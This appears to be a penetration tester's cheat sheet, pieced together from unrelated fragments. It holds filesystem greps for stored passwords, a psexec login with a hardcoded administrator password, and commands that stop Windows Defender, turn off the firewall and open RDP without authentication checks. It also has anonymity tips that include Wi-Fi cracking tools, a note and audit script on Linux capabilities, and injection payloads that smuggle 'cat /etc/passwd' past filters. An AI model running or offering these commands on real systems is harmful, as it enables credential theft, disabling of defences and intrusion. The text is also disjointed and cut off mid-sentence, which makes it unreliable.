grep -rnw '/' -ie 'pass' --color=always
grep -rnw '/' -ie 'DB_PASS' --color=always
grep -rnw '/' -ie 'DB_PASSWORD' --color=always
grep -rnw '/' -ie 'DB_USER' --color=always
.\psexec64.exe \\192.168.x.x -u .\administrator -p admin@123 cmd.exe
sc stop WinDefend
netsh advfirewall show allprofiles
netsh advfirewall set allprofiles state off
netsh firewall set opmode disable
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f
1) Make a hidden encrypted volume with Truecrypt 7.1a [0]
2) Inside the encrypted volume install Whonix [1]
3) (Optional) While just having everything go over Tor thanks to Whonix is
probably sufficient, it's better to not use an internet connection connected
to your name or address. A cantenna, aircrack, and reaver can come in handy
e: Effective
This means the capability is “activated”.
p: Permitted
This means the capability can be used/is allowed.
i: Inherited
The capability is kept by child/subprocesses upon execve() for example.
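An added example (not part of the original page) showing how the e/p/i flags above appear in `getcap`-style output and how an audit script can use them to list binaries whose sensitive capabilities are both permitted and effective. The sample output, the `HIGH_RISK` shortlist and the function names are assumptions made for this example.

```python
import re

# Capabilities that commonly allow privilege escalation when granted to a
# binary (a shortlist assumed for this example, not an exhaustive list).
HIGH_RISK = {"cap_setuid", "cap_setgid", "cap_sys_admin", "cap_dac_override",
             "cap_dac_read_search", "cap_sys_ptrace", "cap_sys_module"}

# Constructed sample of `getcap -r /` output; both the older "path = caps+ep"
# and the newer "path caps=ep" layouts are included.
SAMPLE = """\
/usr/bin/ping cap_net_raw=ep
/usr/bin/python3.11 = cap_setuid+ep
/usr/sbin/tcpdump cap_net_admin,cap_net_raw=eip
/opt/tool/helper cap_sys_ptrace=i
"""

LINE = re.compile(r"^(?P<path>\S+)\s+(?:=\s+)?(?P<clauses>.+)$")
CLAUSE = re.compile(r"^(?P<caps>[a-z_,]+)(?P<op>[=+])(?P<flags>[eip]*)$")

def parse_getcap(text):
    """Return {path: {capability: set of flag letters 'e', 'p', 'i'}}."""
    result = {}
    for line in text.splitlines():
        m = LINE.match(line.strip())
        if not m:
            continue
        caps = result.setdefault(m["path"], {})
        for clause in m["clauses"].split():
            c = CLAUSE.match(clause)
            if not c:
                continue  # forms this example does not model (e.g. '-' clauses)
            for name in c["caps"].split(","):
                caps.setdefault(name, set()).update(c["flags"])
    return result

def review_list(parsed):
    """(path, capability) pairs where a high-risk capability is both p and e."""
    hits = []
    for path, caps in sorted(parsed.items()):
        for name, flags in sorted(caps.items()):
            if name in HIGH_RISK and {"p", "e"} <= flags:
                hits.append((path, name))
    return hits

if __name__ == "__main__":
    for path, name in review_list(parse_getcap(SAMPLE)):
        print(f"review: {path} holds {name} (permitted + effective)")
```

A capability that carries only the `i` flag, as on the constructed `/opt/tool/helper` line, is not reported because it is neither permitted nor effective for that binary.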
{echo,hello,world}
CMD=$'\x20a\x20b\x20c';echo$CMD
CMD=$'\x20a\x20b\x20c'&&echo$CMD
google.com&&CMD=$'\x20/etc/passwd'&&cat$CMD